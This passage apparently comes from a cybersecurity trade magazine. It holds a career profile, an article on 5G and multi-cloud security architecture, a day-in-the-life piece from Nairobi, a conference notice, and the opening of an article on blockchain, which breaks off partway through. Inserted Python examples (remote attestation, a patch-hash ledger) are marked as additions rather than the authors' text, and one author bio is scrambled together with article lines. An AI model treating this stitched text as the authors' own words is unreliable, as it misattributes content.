scams. Calling individuals to threaten the release of their
medical information and demand money. This attack had
an immediate impact on thousands of patients but then
rippled to impact other individuals and organizations
by forcing them to review their preparedness for such
an attack. Suddenly, everyone in the country knew what
cybersecurity was.

Ireland is home to the European headquarters of the


largest tech companies in the world and has a thriving tech
workforce. We are suffering the same cyber skills gap as the
rest of the world with nearly half of cyber and infosec roles
remaining unfilled. On top of this, many organizations lack
a ‘security culture’ and continue to think that cybersecurity
is an IT problem rather than everyone's problem to tackle.

Personally, this attack impacted those close to me by restricting their access to medical services, and I received numerous vishing phone calls.


Professionally, I had recently taken on a role as a lecturer to create a Professional Diploma in Cybersecurity with UCD Professional Academy. Due to the attack, the demand for this course was overwhelming as managers scrambled to get guidance on the threats they faced. I am grateful that I can give my students the knowledge and tools for them to improve their organization’s security posture by putting the correct incident responses in place so they can reduce the impact and recover quickly from such an attack.

Early Days

I left school in the early 90s, but going to college was not an option then. Most young Irish people went straight to work or, failing that, emigrated. I took a different path by training to be an electrician, a very unpopular choice for young women at the time, and still is. I adored the work and working on building sites, and after a few years, I decided to go to college to study electronic engineering as a mature student. I have been a lifelong learner ever since.

I love learning and I am constantly taking certifications and training. I still strive for equal opportunities for women in trades and STEM.

After graduating I worked as an IC layout technician and Electronics Technician in a college. At this point, I had just had my third child and we faced a common dilemma for young families with spiraling childcare costs. Our solution was also common, as I decided to take some time out to care for my children.

After a couple of years, I returned to work. I sought a role that would work with my family, and I went into IT teaching. This was an excellent fit and I went on to study for a Master's in Adult Education and took more tech qualifications.

This was a hugely rewarding role as it was ‘second-chance’ education for adults who missed out on their education when they were young. Many students progressed to work or college, to pursue their dream roles.

Moving into Cybersecurity

One time in a class we were discussing progression and
the opportunities available to young people now, when
I was asked if I had my time again, what career would I
choose? I did not hesitate and chose cybersecurity. It was a
lightbulb moment and by the end of the day, I had enrolled
in a Master's in Applied Cybersecurity at Technological
University Dublin, the same college I had worked in
earlier in my career. The program ran for over two years,
and I enjoyed every part of it, the pen testing, the secure
networks, the programming, all of it.

I learned a huge amount and made fantastic connections. The next year I gave up teaching and started working with small businesses, helping them prepare for the impending GDPR. I enjoyed this role and wanted more experience as a practitioner and auditor in the industry, so over the next few years, I got the opportunity to work in some of the top infosec and cybersecurity firms in Ireland. I was very content with my role and did not regret making a career change in my forties. Life was good, then Covid-19 hit.


COVID-19 Hit

When COVID-19 hit, I became part of the ‘great resignation’, which was when many of us took the opportunity to take stock, reevaluate our life paths, and make a change. Ireland was under lockdown, which meant working from home, children home-schooling, and parents needing extra support. While it was a temporary situation, I made some permanent changes by resigning from a role I loved, but it was for the right reasons. I missed teaching and I wanted to build something, a company that would close the cyber skills gap by offering training to professionals to upskill or move into information security and cybersecurity. This is how Fortify Institute came to be. The mission of Fortify Institute is to provide quality cybersecurity, information security, and physical security training to professionals. As a woman and someone who moved into cybersecurity in my 40s, I wanted to offer these training opportunities to women and older people too.

If I could offer advice to anyone considering a career change, it is to look to cybersecurity and information security. There are so many opportunities, and many skills we have acquired by that stage of our lives are transferable. Other skills can be learned via accessible, affordable training. Often our age, experience, and confidence are a great advantage. Get involved in your local cyber community; it is a brilliant and fun way to grow your network and learn. One of my proudest accomplishments in my cyber career was to deliver a talk on cyber learning opportunities at BSides Dublin 2022, which is a wonderful, community-focused organization.

My Journey with PECB

When I created Fortify Institute, I looked at the certification bodies out there whom I could reach out to, to gain certification, and deliver certification and education as a trainer. PECB has been a fantastic support to me and Fortify Institute. Through PECB I am a Certified ISO/IEC Lead Implementer, and I became a PECB Certified Trainer, which has opened so many opportunities for me.

I enjoy being part of the PECB community, writing articles such as ‘The Role of the Human Factor: Social Engineering’ and contributing to whitepapers such as ‘Ethical Hacking Whitepaper’ and ‘ISO/IEC 27002:2022 Whitepaper’.

As an SME business owner, this type of industry validation is invaluable and helps me stand out in a crowded marketplace. The PECB community is a fantastic source of support and opportunities. PECB shares my values around inclusivity and reducing barriers to education and training.

Volunteer Work

One of the benefits of working for myself is that I can give my time to causes close to my heart, such as organizations that promote the industry to young women, career changers, returners, and other underrepresented groups. Volunteering is an opportunity to meet like-minded people who share your vision and see value in the experience, not just financial goals.

As a member of the committee of Cyber Women Ireland, we work to increase girls' and women’s entry, retention, and return to the cybersecurity industry. Returners are close to my heart, as often women have left their successful careers due to overwhelming childcare costs. They make this decision for their families at the time, but when their children have grown or their relationships have broken down, they need the support that the dedicated returner program provides to return to work.

As a member of The National Cyber Awareness Task Force, our mission is to create learning resources for frontline workers to support women suffering from tech-facilitated abuse such as cyberstalking. This will take the form of online training for police, health care workers, teachers, etc. ENISA, the European Cyber Agency, does fantastic work in researching cybersecurity trends, and I am a member of the ENISA Ad-hoc working group for Cybersecurity Markets. ENISA often seeks security experts to join their working groups, and it is a wonderful opportunity to contribute to the community and connect with international experts. I mentor those who enter cybersecurity but do not know where to start. It is tough, as many do not yet know where they want to specialize.

So, I encourage them to immerse themselves in cyber. Do some short free courses, listen to podcasts, read the books, watch YouTube classes, sign up for national alerts, but most importantly, get involved with the community, network, and volunteer. The rest will come.

What the Future Holds

When I began writing this piece, I questioned whether I was successful. I am extremely fortunate; I am happy and healthy with wonderfully supportive family and friends. Success is subjective, and I consider it from a work-life balance perspective, not an accumulated wealth perspective. I get to do the job I love in a thriving industry, so yes, I am successful. I have recently been shortlisted as Cyber Educator of the Year 2022 in the EU Cyber Awards, which I am immensely proud of. I see busy years ahead of me as I scale Fortify Institute and partner with other organizations.

I will continue to learn and keep my skills up-to-date. I will continue to be active in the security community and support and mentor those who are entering the industry. If I can aid you with your success, please connect on LinkedIn.


Network Security Architectures for 5G, Cloud, and Disaggregated Telecom Infrastructures
INNOVATION

BY SAAD SHEIKH

5G deployments have grown exponentially during the last 24 months. According to industry reports, the world will reach over 1 billion 5G connections in 2022 and over 4.87 billion connections by 2027, combined with an average consumption of 6.5 GB per subscriber, reaching 15 GB in 2022. This is a scale of networks the world has not seen before, and the risk of not knowing what we are going to manage is greater than any value that will come from technology advancements.

The biggest concern, doubt, or customer requirement to migrate services fast on these next generation networks largely depends on how the Security Architecture will address the following key points:

 Data Control and Security
 User Rights and Privacy
 Network Security

This discussion must be the first starting point for any Future Network architecture. With early beta-type 6G networks expected around the 2027 era, we are just a 5-year gap away from something that we in the Telecom industry have not been prepared for.

This is why I have selected this important topic of “Network Security Architectures for 5G, Cloud, and Disaggregated Telecom Infrastructure” to share my view on how we can address these requirements, what we have accomplished, and where there are gaps that need to be addressed promptly.

Why Secure Connectivity is Vital

Telecom systems have, since their inception, been trusted and believed to deliver societal value, but mostly the trust in security is assumed, which raises questions when it comes to 5G Networks, which are based on Cloud connectivity models.


In 2021 alone, Network attacks rose by 31%; this is why Telcos are spending on security infrastructure to build future Networks.

It is not only the security of Networks but also of data: as per industry progress, 73% of Telcos' data remains untapped to deliver business value. Therefore, one important aspect of delivering security is enabling the right End-to-End data architecture that enables security-as-a-service solutions across the Networks, all the way from Cloud to Core to Edge.

5G Security Challenges

There has been a long debate on what should be the right architecture for 5G and future Networks, and within ITU and 3GPP this domain is already well addressed. However, the real challenge of the new technology wave will only come once we deploy it in a distributed fashion at scale.

This is because almost every real use case of 5G, and its monetization, sits outside the data center or a central colocation. Large-scale deployment of 5G means that a typical Telco will need to deploy thousands of mini 5G networks for enterprises, each of which will have unique needs. In addition, they cannot afford data aggregation in data centers, so data must be broken out and processed at the nearest point of value, which mostly will be near to the source at the Edge.

This makes Telecom security discussions more challenging because the Edge is where IT and OT really meet the Telco world. It also means that a Telecom security architecture alone will not be enough, and that to make any real use case out of this complexity there is only one promising deployment model, which is based on “Network Disaggregation”.

In an Open and Disaggregated world there are just too many entry points for a security breach. The vital importance of security, and how it should be approached, was experienced in 2022 by Toyota Motors, who were forced to halt operations across all of its plants in Japan following an attack on Kojima Industries, which supplies the auto giant with vital parts.

What this really entails is that merely one view on security is not enough; it also means we need to enable new and agile methodologies in Telecom around security, with “intrinsic security” as the base and foundation to design and build any network.

Data Architecture Challenges

During the time the world was shut down due to COVID-19, what kept it functional behind closed doors was Telecom’s critical infrastructure and the systems that made it possible to access the needed services in a secure way.

Therefore, although government support to accelerate new technology rollouts like 5G and Edge was created, what came natively was increased spending on security.

In 2022 alone, global spending on network security has reached $168 billion, which is over 15% more than the previous year. What is obviously causing this is the horrendous growth of “data”, to a level that we can safely say today’s business is all about data and an organization’s unique capability to manage it in a secure manner.

 Google does it by knowing people's search habits
 Facebook does it through the social circle
 Uber by navigating the world’s traffic
 Telcos by monetizing their pole position

In one way or another, Telecom Networks will be designed with more “data-driven architectures.”

Understanding this End-to-End story is of critical importance before we devise any architecture or solution.

Cyber Resilient Networks

The biggest problem I have seen in Telecom Network evolution since the time of NFV is what we call an “Air Gap” problem. What it really means is that we want to keep existing security architectures and tune or reshape them to fit the IT and Cloud world.

Maybe it would have been nice if we had started off from the IT world and brought the latest and greatest to meet Telco service needs. This could mean a more pragmatic approach to an operating model as 5G and future networks scale.


As future networks of 5G, Edge, and Open RAN will be built on cloud-native architectures, building secure products will not be enough; rather, E2E secure data architectures will be required: “End-to-End Security Architecture based on intrinsic security will be the foundation of Next generation Telecom Networks.”

Such an architecture should be based on the following principles:

1. Intrinsic Security – which means security in each layer, starting from silicon to supply chain to product retirement
2. Automation – which means real-time security insights and a security SoC before anything boils up
3. Intelligence – as the frontier of the data decade, where we empower ML and AI on trusted data to a level where we can make the best-informed decisions
4. Orchestration – which means all the unnecessary details are abstracted to give a tenant only what it needs to know

Security Framework for 5G and NextGen Networks

Security requirements and challenges will be wider in 5G than in previous generations, reflecting the far broader range of potential use cases and potential threats.

Further contributing factors will come from the way 5G meets the need for higher speed and lower latency combined with power efficiency needs, a wider variety of actors and device types, and more use of the cloud and virtualization.

5G will be built upon network slicing and the “network of networks” concept. Any security measures must take both this and edge computing requirements into account. Below are the security dimensions in 5G:

Network Challenges                                 Security Challenges

Multi Access                                       Lightweight security
- Massive Multi-Input Multi-Output (MIMO)          - Sensitive Traffic Encryption
- Back, mid, front hauling coverage                - Connected Nodes Authentication (check)

Distributed User Plane                             Security at the edge
- Control/User Plane Separation (CUPS)             - Virtualized and Containerized firewalls
- Mobile Edge Computing (MEC)                      - Cloud SDN Security

Programmable Network                               Strong Isolation
- NFV/SDN based network slicing                    - Slice Isolation
- Automated service function chaining              - Slice Visibility


The main security requirements to secure the upcoming IoT/5G services fall under the following main categories:

 Identity Access Management and Authentication
 Communication Security
 Data Security (Confidentiality, Integrity, Availability)

These security requirements should be distributed over the below security layers:

 Network Layer Security: This layer can be split in two parts: network access (part of the control plane) and network application (user plane). Different types of access, i.e. 3GPP (5G, LTE-M, NB-IoT, etc.) or non-3GPP (Wi-Fi, Zigbee, etc.), can be considered. Under the umbrella of 3GPP, 5G/IoT will benefit from all the mobile security and privacy features, such as support for user identity confidentiality, entity authentication, confidentiality, signaling protection, and data encryption. Although 3GPP defines several key security methodologies in its specifications, CSPs still need to do the provisioning and configuration.
 Service layer security: Services can be split into those that are defined by 3GPP, i.e. 3GPP services, and services that are provided by service providers or third parties. As such, service layer mechanisms are defined within the domain of the service provider and cover aspects such as service authentication, confidentiality, integrity protection, and privacy.
 Application layer security: Service providers implement their services by providing applications to their subscribers. In addition to the security provided by the service layer, each application may implement additional or different security mechanisms. These could cover security mechanisms such as end-to-end data encryption and integrity protection.
 Device or Endpoint security: Certain devices are required to implement security mechanisms in order to make sure only authorized users have access to device resources and in order to make sure that assets such as the device identifier cannot be manipulated. Those mechanisms are covered within the device security layer. In addition, aspects such as provisioning the UE with service or network access subscriptions, device theft, device integrity, and grouping of devices (e.g. for bulk authentication and management) are covered.

The security requirements should be defined per use case, but in the end they follow the CIA triad (Confidentiality, Integrity, Availability). Below are different use cases for connected cars with the required security profile level:

Sector          Use case                                      Segment           Security Profile
Connected car   Vehicle Platform FOTA                         Mission-critical  Very High
Connected car   Autonomous driving                            Mission-critical  Very High
Connected car   Stolen Vehicle Recovery                       Massive IoT       High
Connected car   In-Vehicle Entertainment & Internet Access    Massive IoT       Medium


Cloud Infrastructure Security

With future networks based on open and standard infrastructure, it is important that security is enabled as a standard foundation of the infrastructure, one that promises and guarantees SLAs for secure infrastructure. The foundation of such a resilient architecture should comprise the following reference architecture blocks:

1. Safe BIOS: mitigates the risk of BIOS tampering with integrated firmware attack detection
2. Safe ID: protects an IT and cloud infrastructure using biometric security
3. Cloud Security: all the way from TPM to HSM
4. UEFI Secure Boot Customization: will protect your infrastructure from security vulnerabilities during boot
5. SafeSupply Chain Tamper-Evident Services: verify nothing happens to the device during transport. These tamper-evident seals are added to the device and the box at the factory, prior to shipping. Pallet seals can also be added to increase security
6. SafeSupply Chain Data Sanitization Services: prevent spyware or illicit agents from being injected into the hard drive
7. Data control: using NIST 800-88 standards to ensure that, even in the case of 5G networks hosted on Public Clouds, customers can keep their data secure and under their control
8. RSA Secure ID and remote attestation: to cryptographically determine the identity of Baremetal servers
9. Cyber Recovery for Sheltered Harbor: a fast, cost-effective, and efficient means to protect critical data by adopting the vault mechanism and to recover the data in case of a network security attack
10. Network Endpoint Security SafeGuard: will be needed to detect, prevent, and respond to the full spectrum of modern cyber-attacks with the least amount of administrative effort. It applies artificial intelligence (AI) and machine learning (ML) to streaming telemetry data to proactively detect and block network attacks

Multi Cloud Security

5G and Future Networks will follow different and diverse types of cloud to deliver services, ranging from Telco cloud to IT Cloud to Public Cloud Providers; in such a case it is important to both reliably define security and also give tenants real-time visibility as a workload traverses different clouds.

Based on GSMA FASG and Linux Foundation – Anuket work, and the definitions in the MITRE framework, Multi Cloud Security Architectures should address the following needs:

1. Policy controls: where Telcos can declare the intent or policy, and workloads can traverse across clouds while complying with that policy's SLAs
2. Real-time visibility: where a common data model approach captures events and behaviors across all infrastructures
3. Security SoC: where all security-related features are monitored to give both the end-to-end view and also enable a timely response
4. CI/CD of Security Pipelines: which will focus on end-to-end automation of critical activities, focusing on continuous security assessments, compliance monitoring, and security configuration control.

“Finally, the most important piece will be the Operational model, because there will be workloads that will be distributed across different cloud environments; in such a case, how can we ensure a consistent single pane of glass?”

Below is one holistic view on how Dell Technologies is supporting customers to deliver secure infrastructure and security solutions, like cyber recovery, to enable true Multi Cloud Era Security Architectures:

[Figure: Dell cyber recovery architecture. On-premise workloads and services (Tier 1/0 apps, DBs, x86, midrange and mainframe hosts, VMs/containers and apps, management and restore hosts) in the data domain replicate across a secure air gap to an off-premise Cyber Recovery Vault holding immutable copies on a Cyber Recovery storage system, with long-term retention on an object/cloud tier.]
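To make the remote attestation block and the policy-control need concrete, here is an added example (not Dell's, GSMA FASG's or Anuket's code): a verifier that checks a bare-metal host's secure-boot measurements against a fresh nonce and then allows a workload onto that cloud only if the host attests cleanly and provides every control demanded by the use case's security profile from the connected-car table. The control names, keys and measurements are constructed, and the quote is an HMAC stand-in for a TPM signature.

```python
"""Attested placement check for a Telco workload traversing clouds.
Added illustrative example, not Dell, GSMA FASG or Anuket code. The attestation
quote is simplified to an HMAC over nonce || PCR digest with a per-server key
enrolled at commissioning; a real TPM signs the quote with an asymmetric key."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Security profiles from the connected-car table, mapped to the controls a hosting
# cloud must have attested before a workload may be placed on it (names constructed).
PROFILE_CONTROLS = {
    "Very High": {"secure_boot", "attested_identity", "slice_isolation",
                  "traffic_encryption", "immutable_backup"},
    "High": {"secure_boot", "attested_identity", "traffic_encryption"},
    "Medium": {"traffic_encryption"},
}
USE_CASE_PROFILE = {
    "Vehicle Platform FOTA": "Very High",
    "Autonomous driving": "Very High",
    "Stolen Vehicle Recovery": "High",
    "In-Vehicle Entertainment & Internet Access": "Medium",
}

@dataclass
class Enrolment:
    attestation_key: bytes  # constructed; a TPM would hold an asymmetric key instead
    golden_pcrs: dict       # index -> hex SHA-256 recorded when the server was trusted
    controls: set           # security controls this server/cloud provides

def pcr_digest(pcrs):
    """Fold the reported PCR values into one digest, in index order."""
    h = hashlib.sha256()
    for idx in sorted(pcrs):
        h.update(bytes([idx]) + bytes.fromhex(pcrs[idx]))
    return h.digest()

def make_quote(server_id, key, nonce, pcrs):
    """Attester side (simulated): bind the verifier's nonce to the boot measurements.
    Returns the quote as (server_id, nonce, pcrs, mac)."""
    mac = hmac.new(key, nonce + pcr_digest(pcrs), hashlib.sha256).digest()
    return (server_id, nonce, pcrs, mac)

class Verifier:
    """Verifier side of remote attestation: issues nonces and checks quotes."""
    def __init__(self, enrolments):
        self.enrolments = enrolments
        self.outstanding = {}  # server_id -> nonce issued and not yet consumed

    def challenge(self, server_id):
        nonce = secrets.token_bytes(16)
        self.outstanding[server_id] = nonce
        return nonce

    def verify(self, quote):
        """Return (ok, reason); rejects unknown servers, replayed nonces, bad MACs
        and boot measurements that drifted from the golden values."""
        server_id, nonce, pcrs, mac = quote
        enr = self.enrolments.get(server_id)
        if enr is None:
            return False, "unknown server"
        expected = self.outstanding.pop(server_id, None)
        if expected is None or not hmac.compare_digest(expected, nonce):
            return False, "nonce mismatch or replay"
        good = hmac.new(enr.attestation_key, nonce + pcr_digest(pcrs),
                        hashlib.sha256).digest()
        if not hmac.compare_digest(good, mac):
            return False, "bad quote signature"
        drifted = sorted(i for i in set(pcrs) | set(enr.golden_pcrs)
                         if pcrs.get(i) != enr.golden_pcrs.get(i))
        if drifted:
            return False, f"boot measurement drift in PCR {drifted}"
        return True, "attested"

def may_place(verifier, use_case, quote):
    """Policy control: attest first, then require every control of the profile."""
    ok, reason = verifier.verify(quote)
    if not ok:
        return False, reason
    required = PROFILE_CONTROLS[USE_CASE_PROFILE[use_case]]
    missing = required - verifier.enrolments[quote[0]].controls
    if missing:
        return False, f"missing controls: {sorted(missing)}"
    return True, "placement allowed"

def measure(label):
    """Stand-in for a firmware/boot-component measurement (constructed)."""
    return hashlib.sha256(label.encode()).hexdigest()

# Constructed sample enrolments: an edge server with the full control set and a
# public-cloud host without secure boot or slice isolation. Keys are fabricated.
SAMPLE_ENROLMENTS = {
    "edge-01": Enrolment(b"constructed-ak-edge-01",
                         {0: measure("bios-v1.2"), 7: measure("secure-boot-on")},
                         set(PROFILE_CONTROLS["Very High"])),
    "public-01": Enrolment(b"constructed-ak-public-01",
                           {0: measure("hypervisor-image"), 7: measure("secure-boot-off")},
                           {"attested_identity", "traffic_encryption"}),
}
```

Each call to `challenge` issues a nonce that `verify` consumes exactly once, so a captured quote cannot be replayed, and a host whose PCR 7 changes (secure boot turned off) is refused before any policy check runs.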


Conclusion

As 5G and future networks are scaling and more services are being migrated, “Security” and “data control” become a central discussion.

However, there is no one standard that fully captures the Security requirements and can fulfill the unique requirements of Telecom and vertical industries. It is, therefore, important to build and define a holistic end-to-end architecture based on “Zero Trust architectures”, using a data-driven approach and automation.

This also means that security must be designed intrinsically in every layer and then orchestrated to deliver, as a service, the unique characteristics required by different services and workloads, in a manner that will accommodate multiple fields and industries accordingly.

We, as an industry, still have a lot of work to do, especially in bringing all the Modern Edge and Hyperscaler architectures to the Telco world in a secure and reliable manner. However, it is worth mentioning that we have certainly solved certain issues and have seen, and are seeing, some early deployments that prove that Open and Modular infrastructures will be the foundation to deliver seamless, secure connectivity experiences in the new digital world.

Saad Sheikh
Lead Systems Architect APJ – Orchestration and NextGen Ops

Saad Sheikh is APJ Lead Systems Architect for Orchestration and NextGen Ops in Dell Telecom Systems Business (TSB). In this role he is responsible for supporting partners, NEPs, and customers to simplify and accelerate Networks transformation to Open and Disaggregated Infrastructures and solutions (5G, Edge Computing, Core, and Cloud Platforms) using Dell’s products and capabilities that are based on Multi Cloud, Data driven, ML/AI supported, and open ways to build next generation Operational capabilities. In addition, as part of the Dell CTO team he represents Dell in Linux Foundation, TMforum, GSMA, ETSI, ONAP, and TIP. He has over 20 years of experience in the industry in Telcos, System Integrators, Consulting business, and with telecom vendors, where he has worked on E2E Telecoms systems (RAN, Transport, Core, Networks), Cloud platforms, Automation and Orchestration, and Intelligent Networking.

A dedicated technologist and prolific evangelist with demonstrated commitment to continuous learning and skill advancement. Author and creator of numerous articles, whitepapers, blogs, and informative videos. During his free time he shares experiences with the community through his blog channel https://nfvsdn5g.cloud/

A Day in the Life of a Cybersecurity Expert
WORK-LIFE BALANCE

BY FRANCIS KURIA

As most involved in the cybersecurity field, my day also consists of a long and tiring schedule, but, as most cybersecurity experts, I love my job and this industry. Working towards a better and more secure digital space is a great motivation each morning. Because of this field I have had the pleasure, and still do, of meeting and working with a great array of cybersecurity experts who have a great deal of experience; however, I still get to meet and work with a great number of aspiring youth with a passion for this industry. As it comes with many challenges and requires a lot of time and effort, studying, staying up-to-date with all new innovations or potential threats, and, for many, an imbalanced work-life schedule with time away from loved ones and a lot of focus on work, I am sharing with you a day in my life and the balance that I have found.

Getting Started
5:20 AM: It starts this early with the annoying alarm
clock emitting a random pattern of beeping sounds. I get
tempted to actually chase after the clock in order to shut it
off, but fortunately, my wife gets to it before I do, and just
like that, the first ‘false positive’ alert of the day officially
checks in. I turn sides and continue sleeping for the next
15 minutes. It happens that the 5:20 AM wake-up alert was
for Jeff, the 4-year-old, whose bus driver will be hooting
outside the gate at 5:50 AM. After he leaves, it will be my
turn out of the same gate at 6:30 AM.

7:45 AM: Thanks to the excellent road network in Nairobi city, I am at the building entrance in the heart of Nairobi City (CBD) staring up at the office on the third floor.

I acknowledge that I am about to undertake my official workout for the day and I cannot help reflecting on my life before the cybersecurity career, where an hour morning run from 5:00 AM to 6:00 AM was the norm. I find my way up panting slightly, but I make it. I also make a mental check and mark the workout task as complete as I proceed to open up my laptop. I grab a cup of tea and start a routine that will take the next four hours.


Getting Work Done

I review and reply to emails ranging from security logs to admin issues and business development. I complete tasks related to the review of the expected receipts, plans for expenses, and follow-up on customer leads, and I must say that having had a business background early in my career comes in handy; otherwise, I would take the whole day with these tasks.

I will identify and reach out to the established cybersecurity firms and create a business case for them to consider strategically entering into the untapped East African cybersecurity market. On the list of benefits that I will include in the proposal to such potential firms is the need to tap into the local affordable talent that this part of the world is currently able to produce.

As an ISO/IEC 27002 Lead Manager, I have to understand and be able to help organizations implement 93 security controls (previously 114), and having first-hand exposure and experience with solution providers that address the required controls allows me to deliver effective solutions to customers on consulting projects, and at the same time to be a very effective IS auditor when on an Audit and Assurance engagement.

I get to review dashboard reports from a Unified Threat Management (UTM) platform for all the managed cybersecurity services customers. I resolve any pending issues or escalate them as required and communicate the event or events to each client as per the agreed Service Level Agreement (SLA). This process is very different for every organization and is dependent on the maturity of each organization's security process.

Working Through Lunch

12:00 PM - It is time to rush for an early lunch and get to work through lunch as I prepare for the cybersecurity training scheduled at 2:00 PM at one of the partner institutions.

Cybersecurity Training
2:00 PM - I get to work with aspiring cybersecurity
professionals, help them acquire cybersecurity skills
and also get them to pass top cybersecurity leading
certifications. I have to be creative with the instructional
design as the certification exams are recommended for
professionals who already possess some years of experience
in cybersecurity job roles. This is not always the case.

Most (about 60%) of those enrolled are recent computer science graduates with one year or less in the cybersecurity space. To close this gap, I ensure that for each student, I provide access to our lab infrastructure that will simulate real-world business environments, processes, and IT infrastructures. I will also ensure that they get access to the latest penetration testing distribution tools and finally ensure I provide them access to the top open-source solutions, which they will use to protect the IT systems that I have provided to them. I will also get them involved in the testing and evaluation of our partner products as well, in any ongoing cybersecurity research. At this point, I am more than ready to call it a day.

The Evening Commute

It is 5:00 o'clock somewhere, and it is finally Nairobi's turn. As the “city in the sun” prepares for sunset, it is time to get home to compare notes of the day with Jeff. For the commute home, I will be using Nairobi’s public transport, which consists of buses referred to as "matatus", very colorful, with most having all the colors of the rainbow in a perfect balance, served with blaring music and branded with posters of legendary American rap artists, as well as free Wi-Fi on most of them.

Once inside, my attention is drawn to an IP camera at the front, and just as I thought that cybersecurity work was done for the day, I find myself where we all start, i.e., the information gathering phase (Wi-Fi name and password in plain sight). I find myself asking the question, “What other devices are connected in addition to the IP camera?”

As I am about to jump to the weaponization phase, I make a quick glance around the bus, first at the young man sitting next to me who has been engaged with his phone the entire trip.

His phone seems capable of handling advanced mobile penetration testing tools and I start thinking of what he could be capable of accomplishing.

I now turn to the other passengers and start asking myself, “Are the hackers here?”, “Have they already taken over the IP camera?” I question the thoughts in my head and even start asking myself if a medical doctor happened to be

As I alight, I promise myself to focus on good thoughts and leave the challenges of cybersecurity to official working hours.

Finally Home

It is now 6:00 PM and I am finally home. I find Jeff in the sitting room and after some warm hugs, he quickly invites me to check his new “invention”. It turns out to be a combination of my old gadgets (cables, computer parts, and more related stuff) all precariously connected together using my tool kit set as the base.

I make a good effort to listen to his explanation of how it works, but as I listen all I can picture is his entire invention coming down once I take my tool set kit, another example of a poor security design. He seems to be no different from the software and application developers in the world who ignore the need to implement secure software development practices.

It is now 6:30 PM and the mom is home. It turns out that this is the best time to pull my tool set kit from the invention. I will have a good laugh when I see the invention come down. I also understand that I am about to start the final official workout of the day as I have to run as fast as I can.

I will eventually get caught, just as it happens in the real world where getting hacked is a matter of when, not if. And just like that, I will be looking forward to the challenges of the next day.

Francis Kuria
Cyber Security Lead | CLEH, CEH, CISA, ISO/IEC 27001 Lead Auditor

Francis is a cybersecurity lead who lives in Nairobi, Kenya, with his wife and 4-year-old son. He holds a Master’s Degree in Information Systems from the University of Central Oklahoma (USA). His current industry certifications include: Certified Lead Ethical Hacker (CLEH) from PECB, Certified Ethical Hacker (CEH) from EC Council, Certified Information Systems Auditor (CISA) from ISACA, ISO/IEC 27001 Lead Auditor (PECB), ISO/IEC 27002 Lead Manager (PECB), Network+ Certification (CompTIA), A+ Certification (CompTIA) among others. Francis is a PECB Certified
Instructor and serves as a mentor, helping individuals
on board, whether he would be sitting around imagining
navigate their careers in cybersecurity. His dream is
how one of us would look like after multiple fractures from for a robust cybersecurity framework for Africa. And
an accident. After that thought, I immediately stop and when not in the office, you will find him working
fortunately it is time to alight from the matatu. in his beautiful garden.

This upcoming PECB Insights Conference is an especially noteworthy event,
marking a return to in-person conferences after a three-year period! Designed
to ignite and inspire, this event will feature various new and exciting makings,
where you will be able to see all the trends, influences, and inspirations of this
decade, and where you can connect with C-level professionals.

This conference will host over 40 experts who will be discussing the latest trends
and developments in the world of Information Technology, Security, and Privacy
– with topics surrounding Information Technology, Digital Transformation,
Artificial Intelligence, Blockchain Technology, and much more.

Save the date for the PECB Insights Conference 2022 sessions, scheduled for
17-18 November!

Set to be held in the memorable city of Brussels, this event not only includes
two full days of interactive and immersive sessions but also features two Pre-
Conference Intensive Training Courses.

We are happy to let you know that we are launching the following Training
Courses as part of the Conference in Brussels from November 14-16:

• Digital Transformation Intensive Training Course
• Lead Crisis Manager Intensive Training Course

These Pre-Conference Intensive Training Courses will be delivered by two highly
distinguished trainers with extensive backgrounds in their fields:

• Rinske Geerlings
• Graeme Parker

These sessions and courses will convene the world’s most influential and
brightest minds across industries. By building bridges between specialists and
experts from various industries, we aim to create a community that is inclined to
embrace changes and join forces toward a safer world.

Mark your calendars, as we look forward to seeing you all there!



The Use of Blockchain in Cybersecurity
BY RUDY SHOUSHANY
THE EXPERT

These days cyber-attack trends are constantly increasing in magnitude, frequency, and sophistication. In recent years, we have witnessed escalated cyber-attacks, such as distributed denial of service (DDoS) attacks, phishing, ransomware attacks, man-in-the-middle (MiTM) attacks, SQL injection, and much more, aimed at major networks like Mailchimp, LinkedIn, Canva, Google, Amazon, CNA, WHO, etc. It is safe to say that as technology evolves, so do the bad guys.

The most recent cyber-attacks were launched by nation-states, hacktivist groups, and lone-wolf hackers. Cyber-attacks pose a significant threat to government agencies, businesses regardless of size, and all internet users.

Hence the need for tight cybersecurity to protect online networks from digital attacks on sensitive data, information, and transactions.

In April 2022, email marketing company Mailchimp revealed that its system was hacked and information was exported from the platform's accounts. This affected users such as Trezor and Bitcoin's wallet, whose newsletter database is hosted on Mailchimp.

In March 2021, insurance firm CNA experienced a ransomware attack where the company had to pay a settlement fee of $40 million to retrieve their stolen data. The attack also logged employees out of their systems and blocked access to corporate resources.

In October 2020, Google announced to the public the details of a major cyber-attack against its servers in September 2017. According to the report, the incident was a distributed denial-of-service (DDoS) attack that lasted for over six months, thus topping the record as the biggest attack of its kind.


Undoubtedly, hackers hide behind the decentralized nature
of the internet to keep their anonymity and overcome any
opposition to their attack.


For instance, a DDoS attack will first infect multiple nodes across different domains to produce a semi-coordinated network called a “botnet.” Hackers then hijack each bot and launch them against centralized targets.

Meanwhile, other ways to make centralized targets less vulnerable include database management, increased software deployment, security protocols, and depending less on central "trust."

The decentralized solution relies on blockchain technology to increase the resilience of cybersecurity.

Blockchain technology is equipped with multiple features, configurations, and applications specifically intended to improve security. Configurations including public and private cryptographic keys, contracts, and identity control ensure data protection through verification and authentication of transaction records, privacy, and traceability maintenance.

Blockchain technology is trustless and consensus-focused: it distributes transaction records across a network of computers, shifting record-keeping and transaction verification processes from a central authority to a decentralized network. This removes the single point of failure and thus enhances security and resilience to attack.

5 Uses of Blockchain in Cybersecurity and Privacy

1. Decentralization of Data

Due to blockchain's consensus nature, data stored on-chain is tamper-proof; blockchain-based storage solutions will help achieve decentralized storage that secures digital data.

2. IoT Security

Blockchain technology can be used to maintain cybersecurity in the IoT system by apportioning operation and administrative controls away from a central authority, enhancing device-to-device encryption, and key management techniques to secure data. Distributing information redirects users when a centralized database is hijacked.

3. Software Authentication

Blockchain is well suited to verifying updates in order to detect and stop malicious software from sabotaging devices. Companies can use blockchain hashing to verify patches, updates, and downloads to prevent chain attacks.
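As an added example (not code from the article or from any blockchain project), the following Python builds a minimal hash-chained ledger of published patch hashes. It shows the tamper-evidence that the "tamper-proof on-chain data" claim above rests on, and how a recorded hash verifies a download before it is installed. It is a single-process chain with no replication or consensus; product names, versions and artifact bytes are constructed.

```python
"""Minimal hash-chained ledger of published patch hashes.
Added example, not the article's code and not a real blockchain: one process,
no replication, no consensus. It shows the two properties the article relies
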